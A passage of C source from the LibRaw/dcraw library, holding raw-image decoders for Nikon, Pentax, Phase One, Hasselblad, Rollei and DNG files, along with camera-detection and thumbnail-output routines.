getbits(-1);
for (jrow=0; jrow+7 < jh.high; jrow += 8) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (jcol=0; jcol+7 < jh.wide; jcol += 8) {
ljpeg_idct (&jh);
rp = jh.idct;
row = trow + jcol/tile_width + jrow*2;
col = tcol + jcol%tile_width;
for (i=0; i < 16; i+=2)
for (j=0; j < 8; j++)
adobe_copy_pixel (row+i, col+j, &rp);
}
}
break;
case 0xc3:
for (row=col=jrow=0; jrow < jh.high; jrow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
rp = ljpeg_row (jrow, &jh);
for (jcol=0; jcol < jwide; jcol++) {
adobe_copy_pixel (trow+row, tcol+col, &rp);
if (++col >= tile_width || col >= raw_width)
row += 1 + (col = 0);
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
ljpeg_end (&jh);
throw ;
}
#endif
fseek (ifp, save+4, SEEK_SET);
if ((tcol += tile_width) >= raw_width)
trow += tile_length + (tcol = 0);
ljpeg_end (&jh);
}
}
void CLASS packed_dng_load_raw()
{
ushort *pixel, *rp;
int row, col;
pixel = (ushort *) calloc (raw_width, tiff_samples*sizeof *pixel);
merror (pixel, "packed_dng_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (tiff_bps == 16)
read_shorts (pixel, raw_width * tiff_samples);
else {
getbits(-1);
for (col=0; col < raw_width * tiff_samples; col++)
pixel[col] = getbits(tiff_bps);
}
for (rp=pixel, col=0; col < raw_width; col++)
adobe_copy_pixel (row, col, &rp);
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
free (pixel);
throw ;
}
#endif
free (pixel);
}
void CLASS pentax_load_raw()
{
ushort bit[2][15], huff[4097];
int dep, row, col, diff, c, i;
ushort vpred[2][2] = {{0,0},{0,0}}, hpred[2];
fseek (ifp, meta_offset, SEEK_SET);
dep = (get2() + 12) & 15;
fseek (ifp, 12, SEEK_CUR);
FORC(dep) bit[0][c] = get2();
FORC(dep) bit[1][c] = fgetc(ifp);
FORC(dep)
for (i=bit[0][c]; i <= ((bit[0][c]+(4096 >> bit[1][c])-1) & 4095); )
huff[++i] = bit[1][c] << 8 | c;
huff[0] = 12;
fseek (ifp, data_offset, SEEK_SET);
getbits(-1);
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
diff = ljpeg_diff (huff);
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
RAW(row,col) = hpred[col & 1];
if (hpred[col & 1] >> tiff_bps) derror();
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS nikon_coolscan_load_raw()
{
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
int bypp = tiff_bps <= 8 ? 1 : 2;
int bufsize = width * 3 * bypp;
if (tiff_bps <= 8)
gamma_curve(1.0 / imgdata.params.coolscan_nef_gamma, 0., 1, 255);
else
gamma_curve(1.0/imgdata.params.coolscan_nef_gamma,0.,1,65535);
fseek (ifp, data_offset, SEEK_SET);
unsigned char *buf = (unsigned char*)malloc(bufsize);
unsigned short *ubuf = (unsigned short *)buf;
for(int row = 0; row < raw_height; row++)
{
int red = fread (buf, 1, bufsize, ifp);
unsigned short (*ip)[4] = (unsigned short (*)[4]) image + row*width;
if(tiff_bps <= 8)
for(int col=0; col<width;col++)
{
ip[col][0] = curve[buf[col*3]];
ip[col][1] = curve[buf[col*3+1]];
ip[col][2] = curve[buf[col*3+2]];
ip[col][3]=0;
}
else
for(int col=0; col<width;col++)
{
ip[col][0] = curve[ubuf[col*3]];
ip[col][1] = curve[ubuf[col*3+1]];
ip[col][2] = curve[ubuf[col*3+2]];
ip[col][3]=0;
}
}
free(buf);
}
#endif
void CLASS nikon_load_raw()
{
static const uchar nikon_tree[][32] = {
{ 0,1,5,1,1,1,1,1,1,2,0,0,0,0,0,0, /* 12-bit lossy */
5,4,3,6,2,7,1,0,8,9,11,10,12 },
{ 0,1,5,1,1,1,1,1,1,2,0,0,0,0,0,0, /* 12-bit lossy after split */
0x39,0x5a,0x38,0x27,0x16,5,4,3,2,1,0,11,12,12 },
{ 0,1,4,2,3,1,2,0,0,0,0,0,0,0,0,0, /* 12-bit lossless */
5,4,6,3,7,2,8,1,9,0,10,11,12 },
{ 0,1,4,3,1,1,1,1,1,2,0,0,0,0,0,0, /* 14-bit lossy */
5,6,4,7,8,3,9,2,1,0,10,11,12,13,14 },
{ 0,1,5,1,1,1,1,1,1,1,2,0,0,0,0,0, /* 14-bit lossy after split */
8,0x5c,0x4b,0x3a,0x29,7,6,5,4,3,2,1,0,13,14 },
{ 0,1,4,2,2,3,1,2,0,0,0,0,0,0,0,0, /* 14-bit lossless */
7,6,8,5,9,4,10,3,11,12,2,0,1,13,14 } };
ushort *huff, ver0, ver1, vpred[2][2], hpred[2], csize;
int i, min, max, step=0, tree=0, split=0, row, col, len, shl, diff;
fseek (ifp, meta_offset, SEEK_SET);
ver0 = fgetc(ifp);
ver1 = fgetc(ifp);
if (ver0 == 0x49 || ver1 == 0x58)
fseek (ifp, 2110, SEEK_CUR);
if (ver0 == 0x46) tree = 2;
if (tiff_bps == 14) tree += 3;
read_shorts (vpred[0], 4);
max = 1 << tiff_bps & 0x7fff;
if ((csize = get2()) > 1)
step = max / (csize-1);
if (ver0 == 0x44 && ver1 == 0x20 && step > 0) {
for (i=0; i < csize; i++)
curve[i*step] = get2();
for (i=0; i < max; i++)
curve[i] = ( curve[i-i%step]*(step-i%step) +
curve[i-i%step+step]*(i%step) ) / step;
fseek (ifp, meta_offset+562, SEEK_SET);
split = get2();
} else if (ver0 != 0x46 && csize <= 0x4001)
read_shorts (curve, max=csize);
while (curve[max-2] == curve[max-1]) max--;
huff = make_decoder (nikon_tree[tree]);
fseek (ifp, data_offset, SEEK_SET);
getbits(-1);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (min=row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (split && row == split) {
free (huff);
huff = make_decoder (nikon_tree[tree+1]);
max += (min = 16) << 1;
}
for (col=0; col < raw_width; col++) {
i = gethuff(huff);
len = i & 15;
shl = i >> 4;
diff = ((getbits(len-shl) << 1) + 1) << shl >> 1;
if ((diff & (1 << (len-1))) == 0)
diff -= (1 << len) - !shl;
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
if ((ushort)(hpred[col & 1] + min) >= max) derror();
RAW(row,col) = curve[LIM((short)hpred[col & 1],0,0x3fff)];
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
free (huff);
throw;
}
#endif
free (huff);
}
void CLASS nikon_yuv_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
int row, col, yuv[4], rgb[3], b, c;
UINT64 bitbuf=0;
float cmul[4];
FORC4 { cmul[c] = cam_mul[c]>0.001f?cam_mul[c]:1.f; }
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
if (!(b = col & 1)) {
bitbuf = 0;
FORC(6) bitbuf |= (UINT64) fgetc(ifp) << c*8;
FORC(4) yuv[c] = (bitbuf >> c*12 & 0xfff) - (c >> 1 << 11);
}
rgb[0] = yuv[b] + 1.370705*yuv[3];
rgb[1] = yuv[b] - 0.337633*yuv[2] - 0.698001*yuv[3];
rgb[2] = yuv[b] + 1.732446*yuv[2];
FORC3 image[row*width+col][c] = curve[LIM(rgb[c],0,0xfff)] / cmul[c];
}
}
}
/*
Returns 1 for a Coolpix 995, 0 for anything else.
*/
int CLASS nikon_e995()
{
int i, histo[256];
const uchar often[] = { 0x00, 0x55, 0xaa, 0xff };
memset (histo, 0, sizeof histo);
fseek (ifp, -2000, SEEK_END);
for (i=0; i < 2000; i++)
histo[fgetc(ifp)]++;
for (i=0; i < 4; i++)
if (histo[often[i]] < 200)
return 0;
return 1;
}
/*
Returns 1 for a Coolpix 2100, 0 for anything else.
*/
int CLASS nikon_e2100()
{
uchar t[12];
int i;
fseek (ifp, 0, SEEK_SET);
for (i=0; i < 1024; i++) {
fread (t, 1, 12, ifp);
if (((t[2] & t[4] & t[7] & t[9]) >> 4
& t[1] & t[6] & t[8] & t[11] & 3) != 3)
return 0;
}
return 1;
}
void CLASS nikon_3700()
{
int bits, i;
uchar dp[24];
static const struct {
int bits;
char t_make[12], t_model[15];
} table[] = {
{ 0x00, "Pentax", "Optio 33WR" },
{ 0x03, "Nikon", "E3200" },
{ 0x32, "Nikon", "E3700" },
{ 0x33, "Olympus", "C740UZ" } };
fseek (ifp, 3072, SEEK_SET);
fread (dp, 1, 24, ifp);
bits = (dp[8] & 3) << 4 | (dp[20] & 3);
for (i=0; i < sizeof table / sizeof *table; i++)
if (bits == table[i].bits) {
strcpy (make, table[i].t_make );
strcpy (model, table[i].t_model);
}
}
/*
Separates a Minolta DiMAGE Z2 from a Nikon E4300.
*/
int CLASS minolta_z2()
{
int i, nz;
char tail[424];
fseek (ifp, -sizeof tail, SEEK_END);
fread (tail, 1, sizeof tail, ifp);
for (nz=i=0; i < sizeof tail; i++)
if (tail[i]) nz++;
return nz > 20;
}
//@end COMMON
void CLASS jpeg_thumb();
//@out COMMON
void CLASS ppm_thumb()
{
char *thumb;
thumb_length = thumb_width*thumb_height*3;
thumb = (char *) malloc (thumb_length);
merror (thumb, "ppm_thumb()");
fprintf (ofp, "P6\n%d %d\n255\n", thumb_width, thumb_height);
fread (thumb, 1, thumb_length, ifp);
fwrite (thumb, 1, thumb_length, ofp);
free (thumb);
}
void CLASS ppm16_thumb()
{
int i;
char *thumb;
thumb_length = thumb_width*thumb_height*3;
thumb = (char *) calloc (thumb_length, 2);
merror (thumb, "ppm16_thumb()");
read_shorts ((ushort *) thumb, thumb_length);
for (i=0; i < thumb_length; i++)
thumb[i] = ((ushort *) thumb)[i] >> 8;
fprintf (ofp, "P6\n%d %d\n255\n", thumb_width, thumb_height);
fwrite (thumb, 1, thumb_length, ofp);
free (thumb);
}
void CLASS layer_thumb()
{
int i, c;
char *thumb, map[][4] = { "012","102" };
colors = thumb_misc >> 5 & 7;
thumb_length = thumb_width*thumb_height;
thumb = (char *) calloc (colors, thumb_length);
merror (thumb, "layer_thumb()");
fprintf (ofp, "P%d\n%d %d\n255\n",
5 + (colors >> 1), thumb_width, thumb_height);
fread (thumb, thumb_length, colors, ifp);
for (i=0; i < thumb_length; i++)
FORCC putc (thumb[i+thumb_length*(map[thumb_misc >> 8][c]-'0')], ofp);
free (thumb);
}
void CLASS rollei_thumb()
{
unsigned i;
ushort *thumb;
thumb_length = thumb_width * thumb_height;
thumb = (ushort *) calloc (thumb_length, 2);
merror (thumb, "rollei_thumb()");
fprintf (ofp, "P6\n%d %d\n255\n", thumb_width, thumb_height);
read_shorts (thumb, thumb_length);
for (i=0; i < thumb_length; i++) {
putc (thumb[i] << 3, ofp);
putc (thumb[i] >> 5 << 2, ofp);
putc (thumb[i] >> 11 << 3, ofp);
}
free (thumb);
}
void CLASS rollei_load_raw()
{
uchar pixel[10];
unsigned iten = 0, isix, i, buffer = 0, todo[16];
#ifdef LIBRAW_LIBRARY_BUILD
if(raw_width > 32767 || raw_height > 32767)
throw LIBRAW_EXCEPTION_IO_BADFILE;
#endif
unsigned maxpixel = raw_width*(raw_height+7);
isix = raw_width * raw_height * 5 / 8;
while (fread (pixel, 1, 10, ifp) == 10) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (i=0; i < 10; i+=2) {
todo[i] = iten++;
todo[i+1] = pixel[i] << 8 | pixel[i+1];
buffer = pixel[i] >> 2 | buffer << 6;
}
for ( ; i < 16; i+=2) {
todo[i] = isix++;
todo[i+1] = buffer >> (14-i)*5;
}
for (i = 0; i < 16; i += 2)
if(todo[i] < maxpixel)
raw_image[todo[i]] = (todo[i + 1] & 0x3ff);
else
derror();
}
maximum = 0x3ff;
}
int CLASS raw (unsigned row, unsigned col)
{
return (row < raw_height && col < raw_width) ? RAW(row,col) : 0;
}
void CLASS phase_one_flat_field (int is_float, int nc)
{
ushort head[8];
unsigned wide, high, y, x, c, rend, cend, row, col;
float *mrow, num, mult[4];
read_shorts (head, 8);
if (head[2] * head[3] * head[4] * head[5] == 0) return;
wide = head[2] / head[4] + (head[2] % head[4] != 0);
high = head[3] / head[5] + (head[3] % head[5] != 0);
mrow = (float *) calloc (nc*wide, sizeof *mrow);
merror (mrow, "phase_one_flat_field()");
for (y=0; y < high; y++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (x=0; x < wide; x++)
for (c=0; c < nc; c+=2) {
num = is_float ? getreal(11) : get2()/32768.0;
if (y==0) mrow[c*wide+x] = num;
else mrow[(c+1)*wide+x] = (num - mrow[c*wide+x]) / head[5];
}
if (y==0) continue;
rend = head[1] + y*head[5];
for (row = rend-head[5];
row < raw_height && row < rend &&
row < head[1]+head[3]-head[5]; row++) {
for (x=1; x < wide; x++) {
for (c=0; c < nc; c+=2) {
mult[c] = mrow[c*wide+x-1];
mult[c+1] = (mrow[c*wide+x] - mult[c]) / head[4];
}
cend = head[0] + x*head[4];
for (col = cend-head[4];
col < raw_width &&
col < cend && col < head[0]+head[2]-head[4]; col++) {
c = nc > 2 ? FC(row-top_margin,col-left_margin) : 0;
if (!(c & 1)) {
c = RAW(row,col) * mult[c];
RAW(row,col) = LIM(c,0,65535);
}
for (c=0; c < nc; c+=2)
mult[c] += mult[c+1];
}
}
for (x=0; x < wide; x++)
for (c=0; c < nc; c+=2)
mrow[c*wide+x] += mrow[(c+1)*wide+x];
}
}
free (mrow);
}
int CLASS phase_one_correct()
{
unsigned entries, tag, data, save, col, row, type;
int len, i, j, k, cip, val[4], dev[4], sum, max;
int head[9], diff, mindiff=INT_MAX, off_412=0;
/* static */ const signed char dir[12][2] =
{ {-1,-1}, {-1,1}, {1,-1}, {1,1}, {-2,0}, {0,-2}, {0,2}, {2,0},
{-2,-2}, {-2,2}, {2,-2}, {2,2} };
float poly[8], num, cfrac, frac, mult[2], *yval[2]={NULL,NULL};
ushort *xval[2];
int qmult_applied = 0, qlin_applied = 0;
#ifdef LIBRAW_LIBRARY_BUILD
if (!meta_length)
#else
if (half_size || !meta_length)
#endif
return 0;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Phase One correction...\n"));
#endif
fseek (ifp, meta_offset, SEEK_SET);
order = get2();
fseek (ifp, 6, SEEK_CUR);
fseek (ifp, meta_offset+get4(), SEEK_SET);
entries = get4(); get4();
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
while (entries--) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
tag = get4();
len = get4();
data = get4();
save = ftell(ifp);
fseek (ifp, meta_offset+data, SEEK_SET);
if (tag == 0x419) { /* Polynomial curve */
for (get4(), i=0; i < 8; i++)
poly[i] = getreal(11);
poly[3] += (ph1.tag_210 - poly[7]) * poly[6] + 1;
for (i=0; i < 0x10000; i++) {
num = (poly[5]*i + poly[3])*i + poly[1];
curve[i] = LIM(num,0,65535);
} goto apply; /* apply to right half */
} else if (tag == 0x41a) { /* Polynomial curve */
for (i=0; i < 4; i++)
poly[i] = getreal(11);
for (i=0; i < 0x10000; i++) {
for (num=0, j=4; j--; )
num = num * i + poly[j];
curve[i] = LIM(num+i,0,65535);
} apply: /* apply to whole image */
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col = (tag & 1)*ph1.split_col; col < raw_width; col++)
RAW(row,col) = curve[RAW(row,col)];
}
} else if (tag == 0x400) { /* Sensor defects */
while ((len -= 8) >= 0) {
col = get2();
row = get2();
type = get2(); get2();
if (col >= raw_width) continue;
if (type == 131 || type == 137) /* Bad column */
for (row=0; row < raw_height; row++)
if (FC(row-top_margin,col-left_margin) == 1) {
for (sum=i=0; i < 4; i++)
sum += val[i] = raw (row+dir[i][0], col+dir[i][1]);
for (max=i=0; i < 4; i++) {
dev[i] = abs((val[i] << 2) - sum);
if (dev[max] < dev[i]) max = i;
}
RAW(row,col) = (sum - val[max])/3.0 + 0.5;
} else {
for (sum=0, i=8; i < 12; i++)
sum += raw (row+dir[i][0], col+dir[i][1]);
RAW(row,col) = 0.5 + sum * 0.0732233 +
(raw(row,col-2) + raw(row,col+2)) * 0.3535534;
}
else if (type == 129) { /* Bad pixel */
if (row >= raw_height) continue;
j = (FC(row-top_margin,col-left_margin) != 1) * 4;
for (sum=0, i=j; i < j+8; i++)
sum += raw (row+dir[i][0], col+dir[i][1]);
RAW(row,col) = (sum + 4) >> 3;
}
}
} else if (tag == 0x401) { /* All-color flat fields */
phase_one_flat_field (1, 2);
} else if (tag == 0x416 || tag == 0x410) {
phase_one_flat_field (0, 2);
} else if (tag == 0x40b) { /* Red+blue flat field */
phase_one_flat_field (0, 4);
} else if (tag == 0x412) {
fseek (ifp, 36, SEEK_CUR);
diff = abs (get2() - ph1.tag_21a);
if (mindiff > diff) {
mindiff = diff;
off_412 = ftell(ifp) - 38;
}
} else if (tag == 0x41f && !qlin_applied) { /* Quadrant linearization */
ushort lc[2][2][16], ref[16];
int qr, qc;
for (qr = 0; qr < 2; qr++)
for (qc = 0; qc < 2; qc++)
for (i = 0; i < 16; i++)
lc[qr][qc][i] = get4();
for (i = 0; i < 16; i++) {
int v = 0;
for (qr = 0; qr < 2; qr++)
for (qc = 0; qc < 2; qc++)
v += lc[qr][qc][i];
ref[i] = (v + 2) >> 2;
}
for (qr = 0; qr < 2; qr++) {
for (qc = 0; qc < 2; qc++) {
int cx[19], cf[19];
for (i = 0; i < 16; i++) {
cx[1+i] = lc[qr][qc][i];
cf[1+i] = ref[i];
}
cx[0] = cf[0] = 0;
cx[17] = cf[17] = lc[qr][qc][15] ? ((unsigned int)ref[15] * 65535) / lc[qr][qc][15] : 65535; /* guard against division by zero on crafted files */
cf[18] = cx[18] = 65535;
cubic_spline(cx, cf, 19);
for (row = (qr ? ph1.split_row : 0);
row < (qr ? raw_height : ph1.split_row); row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col = (qc ? ph1.split_col : 0);
col < (qc ? raw_width : ph1.split_col); col++)
RAW(row,col) = curve[RAW(row,col)];
}
}
}
qlin_applied = 1;
} else if (tag == 0x41e && !qmult_applied) { /* Quadrant multipliers */
float qmult[2][2] = { { 1, 1 }, { 1, 1 } };
get4(); get4(); get4(); get4();
qmult[0][0] = 1.0 + getreal(11);
get4(); get4(); get4(); get4(); get4();
qmult[0][1] = 1.0 + getreal(11);
get4(); get4(); get4();
qmult[1][0] = 1.0 + getreal(11);
get4(); get4(); get4();
qmult[1][1] = 1.0 + getreal(11);
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
i = qmult[row >= ph1.split_row][col >= ph1.split_col] * RAW(row,col);
RAW(row,col) = LIM(i,0,65535);
}
}
qmult_applied = 1;
} else if (tag == 0x431 && !qmult_applied) { /* Quadrant combined */
ushort lc[2][2][7], ref[7];
int qr, qc;
for (i = 0; i < 7; i++)
ref[i] = get4();
for (qr = 0; qr < 2; qr++)
for (qc = 0; qc < 2; qc++)
for (i = 0; i < 7; i++)
lc[qr][qc][i] = get4();
for (qr = 0; qr < 2; qr++) {
for (qc = 0; qc < 2; qc++) {
int cx[9], cf[9];
for (i = 0; i < 7; i++) {
cx[1+i] = ref[i];
cf[1+i] = ((unsigned) ref[i] * lc[qr][qc][i]) / 10000;
}
cx[0] = cf[0] = 0;
cx[8] = cf[8] = 65535;
cubic_spline(cx, cf, 9);
for (row = (qr ? ph1.split_row : 0);
row < (qr ? raw_height : ph1.split_row); row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col = (qc ? ph1.split_col : 0);
col < (qc ? raw_width : ph1.split_col); col++)
RAW(row,col) = curve[RAW(row,col)];
}
}
}
qmult_applied = 1;
qlin_applied = 1;
}
fseek (ifp, save, SEEK_SET);
}
if (off_412) {
fseek (ifp, off_412, SEEK_SET);
for (i=0; i < 9; i++) head[i] = get4() & 0x7fff;
yval[0] = (float *) calloc (head[1]*head[3] + head[2]*head[4], 6);
merror (yval[0], "phase_one_correct()");
yval[1] = (float *) (yval[0] + head[1]*head[3]);
xval[0] = (ushort *) (yval[1] + head[2]*head[4]);
xval[1] = (ushort *) (xval[0] + head[1]*head[3]);
get2();
for (i=0; i < 2; i++)
for (j=0; j < head[i+1]*head[i+3]; j++)
yval[i][j] = getreal(11);
for (i=0; i < 2; i++)
for (j=0; j < head[i+1]*head[i+3]; j++)
xval[i][j] = get2();
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
cfrac = (float) col * head[3] / raw_width;
cfrac -= cip = cfrac;
num = RAW(row,col) * 0.5;
for (i=cip; i < cip+2; i++) {
for (k=j=0; j < head[1]; j++)
if (num < xval[0][k = head[1]*i+j]) break;
frac = (j == 0 || j == head[1]) ? 0 :
(xval[0][k] - num) / (xval[0][k] - xval[0][k-1]);
mult[i-cip] = yval[0][k-1] * frac + yval[0][k] * (1-frac);
}
i = ((mult[0] * (1-cfrac) + mult[1] * cfrac) * row + num) * 2;
RAW(row,col) = LIM(i,0,65535);
}
}
free (yval[0]);
}
#ifdef LIBRAW_LIBRARY_BUILD
}
catch (...)
{
if(yval[0]) free(yval[0]);
return LIBRAW_CANCELLED_BY_CALLBACK;
}
#endif
return 0;
}
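/* Uncompressed Phase One data: 16-bit samples are read straight into
   raw_image; when ph1.format is non-zero, each pair of samples is
   de-scrambled by XOR-ing with akey/bkey and swapping bit groups through
   t_mask. Row/column black-level tables, if present, are kept in imgdata
   for later subtraction (LibRaw build only). */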
void CLASS phase_one_load_raw()
{
int a, b, i;
ushort akey, bkey, t_mask;
fseek (ifp, ph1.key_off, SEEK_SET);
akey = get2();
bkey = get2();
t_mask = ph1.format == 1 ? 0x5555:0x1354;
#ifdef LIBRAW_LIBRARY_BUILD
if (ph1.black_col || ph1.black_row )
{
imgdata.rawdata.ph1_cblack = (short(*)[2])calloc(raw_height*2,sizeof(ushort));
merror(imgdata.rawdata.ph1_cblack,"phase_one_load_raw()");
imgdata.rawdata.ph1_rblack = (short(*)[2])calloc(raw_width*2,sizeof(ushort));
merror(imgdata.rawdata.ph1_rblack,"phase_one_load_raw()");
if (ph1.black_col)
{
fseek (ifp, ph1.black_col, SEEK_SET);
read_shorts ((ushort *)imgdata.rawdata.ph1_cblack[0], raw_height*2);
}
if (ph1.black_row)
{
fseek (ifp, ph1.black_row, SEEK_SET);
read_shorts ((ushort *) imgdata.rawdata.ph1_rblack[0], raw_width*2);
}
}
#endif
fseek (ifp, data_offset, SEEK_SET);
read_shorts (raw_image, raw_width*raw_height);
if (ph1.format)
for (i=0; i < raw_width*raw_height; i+=2) {
a = raw_image[i+0] ^ akey;
b = raw_image[i+1] ^ bkey;
raw_image[i+0] = (a & t_mask) | (b & ~t_mask);
raw_image[i+1] = (b & t_mask) | (a & ~t_mask);
}
}
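/* Shared bit reader for the Phase One / Hasselblad / Samsung decoders:
   a 64-bit buffer is refilled 32 bits at a time; nbits == -1 resets it,
   and when a Huffman table is supplied the entry's high byte is the code
   length and the low byte the decoded value. */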
unsigned CLASS ph1_bithuff (int nbits, ushort *huff)
{
#ifndef LIBRAW_NOTHREADS
#define bitbuf tls->ph1_bits.bitbuf
#define vbits tls->ph1_bits.vbits
#else
static UINT64 bitbuf=0;
static int vbits=0;
#endif
unsigned c;
if (nbits == -1)
return bitbuf = vbits = 0;
if (nbits == 0) return 0;
if (vbits < nbits) {
bitbuf = bitbuf << 32 | get4();
vbits += 32;
}
c = bitbuf << (64-vbits) >> (64-nbits);
if (huff) {
vbits -= huff[c] >> 8;
return (uchar) huff[c];
}
vbits -= nbits;
return c;
#ifndef LIBRAW_NOTHREADS
#undef bitbuf
#undef vbits
#endif
}
#define ph1_bits(n) ph1_bithuff(n,0)
#define ph1_huff(h) ph1_bithuff(*h,h+1)
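/* Compressed Phase One data: per-row offsets index the strips; sample
   differences use a code length chosen every 8 columns from length[]
   (a length of 14 marks a literal 16-bit value), format-5 files pass
   small values through the startup curve, and the per-row/column black
   tables are loaded for later correction. */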
void CLASS phase_one_load_raw_c()
{
static const int length[] = { 8,7,6,9,11,10,5,12,14,13 };
int *offset, len[2], pred[2], row, col, i, j;
ushort *pixel;
short (*c_black)[2], (*r_black)[2];
#ifdef LIBRAW_LIBRARY_BUILD
if(ph1.format == 6)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
pixel = (ushort *) calloc (raw_width*3 + raw_height*4, 2);
merror (pixel, "phase_one_load_raw_c()");
offset = (int *) (pixel + raw_width);
fseek (ifp, strip_offset, SEEK_SET);
for (row=0; row < raw_height; row++)
offset[row] = get4();
c_black = (short (*)[2]) (offset + raw_height);
fseek (ifp, ph1.black_col, SEEK_SET);
if (ph1.black_col)
read_shorts ((ushort *) c_black[0], raw_height*2);
r_black = c_black + raw_height;
fseek (ifp, ph1.black_row, SEEK_SET);
if (ph1.black_row)
read_shorts ((ushort *) r_black[0], raw_width*2);
#ifdef LIBRAW_LIBRARY_BUILD
// Copy data to internal copy (even if not read)
if (ph1.black_col || ph1.black_row )
{
imgdata.rawdata.ph1_cblack = (short(*)[2])calloc(raw_height*2,sizeof(ushort));
merror(imgdata.rawdata.ph1_cblack,"phase_one_load_raw_c()");
memmove(imgdata.rawdata.ph1_cblack,(ushort*)c_black[0],raw_height*2*sizeof(ushort));
imgdata.rawdata.ph1_rblack = (short(*)[2])calloc(raw_width*2,sizeof(ushort));
merror(imgdata.rawdata.ph1_rblack,"phase_one_load_raw_c()");
memmove(imgdata.rawdata.ph1_rblack,(ushort*)r_black[0],raw_width*2*sizeof(ushort));
}
#endif
for (i=0; i < 256; i++)
curve[i] = i*i / 3.969 + 0.5;
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fseek (ifp, data_offset + offset[row], SEEK_SET);
ph1_bits(-1);
pred[0] = pred[1] = 0;
for (col=0; col < raw_width; col++) {
if (col >= (raw_width & -8))
len[0] = len[1] = 14;
else if ((col & 7) == 0)
for (i=0; i < 2; i++) {
for (j=0; j < 5 && !ph1_bits(1); j++);
if (j--) len[i] = length[j*2 + ph1_bits(1)];
}
if ((i = len[col & 1]) == 14)
pixel[col] = pred[col & 1] = ph1_bits(16);
else
pixel[col] = pred[col & 1] += ph1_bits(i) + 1 - (1 << (i - 1));
if (pred[col & 1] >> 16) derror();
if (ph1.format == 5 && pixel[col] < 256)
pixel[col] = curve[pixel[col]];
}
#ifndef LIBRAW_LIBRARY_BUILD
for (col=0; col < raw_width; col++) {
int shift = ph1.format == 8? 0: 2;
i = (pixel[col] << shift) - ph1.t_black
+ c_black[row][col >= ph1.split_col]
+ r_black[col][row >= ph1.split_row];
if (i > 0) RAW(row,col) = i;
}
#else
if(ph1.format == 8)
memmove(&RAW(row,0),&pixel[0],raw_width*2);
else
for (col=0; col < raw_width; col++)
RAW(row,col) = pixel[col] << 2;
#endif
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
maximum = 0xfffc - ph1.t_black;
}
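/* Hasselblad 3FR: lossless-JPEG style Huffman coding of differences, two
   samples decoded per step; back[] keeps three rows of predictor history,
   and for multi-sample (multi-shot) files either the selected shot fills
   raw_image or all shots are merged into image[]. */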
void CLASS hasselblad_load_raw()
{
struct jhead jh;
int shot, row, col, *back[5], len[2], diff[12], pred, sh, f, s, c;
unsigned upix, urow, ucol;
ushort *ip;
if (!ljpeg_start (&jh, 0)) return;
order = 0x4949;
ph1_bits(-1);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
back[4] = (int *) calloc (raw_width, 3*sizeof **back);
merror (back[4], "hasselblad_load_raw()");
FORC3 back[c] = back[4] + c*raw_width;
cblack[6] >>= sh = tiff_samples > 1;
shot = LIM(shot_select, 1, tiff_samples) - 1;
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
FORC4 back[(c+3) & 3] = back[c];
for (col=0; col < raw_width; col+=2) {
for (s=0; s < tiff_samples*2; s+=2) {
FORC(2) len[c] = ph1_huff(jh.huff[0]);
FORC(2) {
diff[s+c] = ph1_bits(len[c]);
if ((diff[s+c] & (1 << (len[c]-1))) == 0)
diff[s+c] -= (1 << len[c]) - 1;
if (diff[s+c] == 65535) diff[s+c] = -32768;
}
}
for (s=col; s < col+2; s++) {
pred = 0x8000 + load_flags;
if (col) pred = back[2][s-2];
if (col && row > 1) switch (jh.psv) {
case 11: pred += back[0][s]/2 - back[0][s-2]/2; break;
}
f = (row & 1)*3 ^ ((col+s) & 1);
FORC (tiff_samples) {
pred += diff[(s & 1)*tiff_samples+c];
upix = pred >> sh & 0xffff;
if (raw_image && c == shot)
RAW(row,s) = upix;
if (image) {
urow = row-top_margin + (c & 1);
ucol = col-left_margin - ((c >> 1) & 1);
ip = &image[urow*width+ucol][f];
if (urow < height && ucol < width)
*ip = c < 4 ? upix : (*ip + upix) >> 1;
}
}
back[2][s] = pred;
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
